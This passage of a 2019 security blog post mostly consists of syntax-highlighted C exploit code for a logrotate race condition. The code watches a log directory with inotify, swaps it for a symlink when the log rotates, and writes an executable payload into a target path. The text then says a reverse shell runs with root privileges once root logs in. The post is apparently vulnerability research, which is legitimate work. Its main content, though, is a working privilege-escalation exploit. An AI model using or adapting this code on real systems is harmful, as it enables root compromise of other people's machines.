<span style="color: #339933;">=</span> inotify_init<span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> &nbsp; <span style="color: #b1b100;">if</span><span style="color: #009900;">&#40;</span> DEBUG <span style="color: #339933;">==</span> <span style="color: #0000dd;">1</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/printf.html"><span style="color: #000066;">printf</span></a><span style="color: #009900;">&#40;</span><span style="color: #ff0000;">&quot;logfile: %s<span style="color: #000099; font-weight: bold;">\n</span>&quot;</span><span style="color: #339933;">,</span>logfile<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/printf.html"><span style="color: #000066;">printf</span></a><span style="color: #009900;">&#40;</span><span style="color: #ff0000;">&quot;logpath: %s<span style="color: #000099; font-weight: bold;">\n</span>&quot;</span><span style="color: #339933;">,</span>logpath<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/printf.html"><span style="color: #000066;">printf</span></a><span style="color: #009900;">&#40;</span><span style="color: #ff0000;">&quot;logpath2: %s<span style="color: #000099; font-weight: bold;">\n</span>&quot;</span><span style="color: #339933;">,</span>logpath2<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/printf.html"><span style="color: #000066;">printf</span></a><span style="color: #009900;">&#40;</span><span style="color: #ff0000;">&quot;targetpath: %s<span style="color: #000099; font-weight: bold;">\n</span>&quot;</span><span style="color: #339933;">,</span>targetpath<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/printf.html"><span style="color: #000066;">printf</span></a><span style="color: #009900;">&#40;</span><span style="color: #ff0000;">&quot;targetdir: %s<span style="color: #000099; font-weight: bold;">\n</span>&quot;</span><span style="color: #339933;">,</span>targetdir<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/printf.html"><span style="color: #000066;">printf</span></a><span style="color: #009900;">&#40;</span><span style="color: #ff0000;">&quot;p: %s<span style="color: #000099; font-weight: bold;">\n</span>&quot;</span><span style="color: #339933;">,</span>p<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span> &nbsp; <span style="color: #808080; font-style: italic;">/*checking for error*/</span> <span style="color: #b1b100;">if</span> <span style="color: #009900;">&#40;</span> fd <span style="color: #339933;">&lt;</span> <span style="color: #0000dd;">0</span> <span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/perror.html"><span style="color: #000066;">perror</span></a><span style="color: #009900;">&#40;</span> <span style="color: #ff0000;">&quot;inotify_init&quot;</span> <span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span> &nbsp; wd <span style="color: #339933;">=</span> inotify_add_watch<span style="color: #009900;">&#40;</span> fd<span style="color: #339933;">,</span>logpath<span style="color: #339933;">,</span> IN_MOVED_FROM <span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> &nbsp; &nbsp; <span style="color: #b1b100;">while</span><span style="color: #009900;">&#40;</span><span style="color: #0000dd;">1</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> i<span style="color: #339933;">=</span><span style="color: #0000dd;">0</span><span style="color: #339933;">;</span> length <span style="color: #339933;">=</span> read<span style="color: #009900;">&#40;</span> fd<span style="color: #339933;">,</span> buffer<span style="color: #339933;">,</span> EVENT_BUF_LEN <span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> &nbsp; <span style="color: #b1b100;">while</span> <span style="color: #009900;">&#40;</span>i <span style="color: #339933;">&lt;</span> length<span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> <span style="color: #993333;">struct</span> inotify_event <span style="color: #339933;">*</span>event <span style="color: #339933;">=</span> <span style="color: #009900;">&#40;</span> <span style="color: #993333;">struct</span> inotify_event <span style="color: #339933;">*</span> <span style="color: #009900;">&#41;</span> <span style="color: #339933;">&amp;</span>buffer<span style="color: #009900;">&#91;</span> i <span style="color: #009900;">&#93;</span><span style="color: #339933;">;</span> <span style="color: #b1b100;">if</span> <span style="color: #009900;">&#40;</span> event<span style="color: #339933;">-&gt;</span>len <span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> <span style="color: #b1b100;">if</span> <span style="color: #009900;">&#40;</span> event<span style="color: #339933;">-&gt;</span>mask <span style="color: #339933;">&amp;</span> IN_MOVED_FROM <span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> <span style="color: #b1b100;">if</span><span style="color: #009900;">&#40;</span><a href="http://www.opengroup.org/onlinepubs/009695399/functions/strcmp.html"><span style="color: #000066;">strcmp</span></a><span style="color: #009900;">&#40;</span>event<span style="color: #339933;">-&gt;</span>name<span style="color: #339933;">,</span>p<span style="color: #009900;">&#41;</span> <span style="color: #339933;">==</span> <span style="color: #0000dd;">0</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> <span style="color: #808080; font-style: italic;">/* printf( &quot;Something is moved %s.\n&quot;, event-&gt;name ); */</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/rename.html"><span style="color: #000066;">rename</span></a><span style="color: #009900;">&#40;</span>logpath<span style="color: #339933;">,</span>logpath2<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> symlink<span style="color: #009900;">&#40;</span>targetdir<span style="color: #339933;">,</span>logpath<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> sleep<span style="color: #009900;">&#40;</span><span style="color: #0000dd;">1</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> source <span style="color: #339933;">=</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/fopen.html"><span style="color: #000066;">fopen</span></a><span style="color: #009900;">&#40;</span>payloadfile<span style="color: #339933;">,</span> <span style="color: #ff0000;">&quot;r&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #b1b100;">if</span><span style="color: #009900;">&#40;</span>source <span style="color: #339933;">==</span> NULL<span style="color: #009900;">&#41;</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/exit.html"><span style="color: #000066;">exit</span></a><span style="color: #009900;">&#40;</span>EXIT_FAILURE<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> &nbsp; target <span style="color: #339933;">=</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/fopen.html"><span style="color: #000066;">fopen</span></a><span style="color: #009900;">&#40;</span>targetpath<span style="color: #339933;">,</span> <span style="color: #ff0000;">&quot;w&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #b1b100;">if</span><span style="color: #009900;">&#40;</span>target <span style="color: #339933;">==</span> NULL<span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/fclose.html"><span style="color: #000066;">fclose</span></a><span style="color: #009900;">&#40;</span>source<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/exit.html"><span style="color: #000066;">exit</span></a><span style="color: #009900;">&#40;</span>EXIT_FAILURE<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span> &nbsp; <span style="color: #b1b100;">while</span> <span style="color: #009900;">&#40;</span><span style="color: #009900;">&#40;</span>ch <span style="color: #339933;">=</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/fgetc.html"><span style="color: #000066;">fgetc</span></a><span style="color: #009900;">&#40;</span>source<span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span> <span style="color: #339933;">!=</span> EOF<span style="color: #009900;">&#41;</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/fputc.html"><span style="color: #000066;">fputc</span></a><span style="color: #009900;">&#40;</span>ch<span style="color: #339933;">,</span> target<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> &nbsp; chmod<span style="color: #009900;">&#40;</span>targetpath<span style="color: #339933;">,</span>S_IRUSR <span style="color: #339933;">|</span> S_IXUSR <span style="color: #339933;">|</span> S_IRGRP <span style="color: #339933;">|</span> S_IXGRP <span style="color: #339933;">|</span> S_IROTH <span style="color: #339933;">|</span> S_IXOTH<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/fclose.html"><span style="color: #000066;">fclose</span></a><span style="color: #009900;">&#40;</span>source<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/fclose.html"><span style="color: #000066;">fclose</span></a><span style="color: #009900;">&#40;</span>target<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> inotify_rm_watch<span style="color: #009900;">&#40;</span> fd<span style="color: #339933;">,</span> wd <span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> close<span style="color: #009900;">&#40;</span> fd <span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> &nbsp; <a href="http://www.opengroup.org/onlinepubs/009695399/functions/exit.html"><span style="color: #000066;">exit</span></a><span style="color: #009900;">&#40;</span>EXIT_SUCCESS<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span> <span style="color: #009900;">&#125;</span> <span style="color: #009900;">&#125;</span> i <span style="color: #339933;">+=</span> EVENT_SIZE <span style="color: #339933;">+</span> event<span style="color: #339933;">-&gt;</span>len<span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span> <span style="color: #009900;">&#125;</span> <span style="color: #808080; font-style: italic;">/*removing from the watch list.*/</span> inotify_rm_watch<span style="color: #009900;">&#40;</span> fd<span style="color: #339933;">,</span> wd <span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> &nbsp; <span style="color: #808080; font-style: italic;">/*closing the INOTIFY instance*/</span> close<span style="color: #009900;">&#40;</span> fd <span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> &nbsp; <a href="http://www.opengroup.org/onlinepubs/009695399/functions/exit.html"><span style="color: #000066;">exit</span></a><span style="color: #009900;">&#40;</span>EXIT_SUCCESS<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span></pre></div></pre> <p>As soon as root logs in, the reverse shell gets executed with root privileges.</p> <p> <video controls="" height="360" width="480"><source src="/sites/default/files/DateiUploads/logrotate2.mp4" type="video/mp4" /></video> </p> <h3>Known Issues</h3> <p>I wasn't able to win the race inside a docker container or lvm-volume.</p> <p>&nbsp;</p> <p><b>Update:</b> More details about this problem can be found at <a href="https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition">https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition</a></p> </div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Jan 14 2019</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/security" hreflang="en">Security</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Programming" hreflang="en">Programming</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/c" hreflang="en">C</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/sysadmin" hreflang="en">Sysadmin</a></div> </div> </div> <section class="field field--name-comment-node-blog field--type-comment field--label-hidden comment-wrapper"> </section> <section class="field field--name-comment field--type-comment field--label-above comment-wrapper"> <h2 class='title comment-form__title'> <i class="fa fa-comments-o"></i> Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=275&amp;2=comment&amp;3=comment" token="n9usVfEUtf7byg_DtY0U2-fcm665S_LxRZ3k1aaN8cE"></drupal-render-placeholder> </section> Mon, 14 Jan 2019 20:06:52 +0000 Hoti 275 at https://tech.feedyourhead.at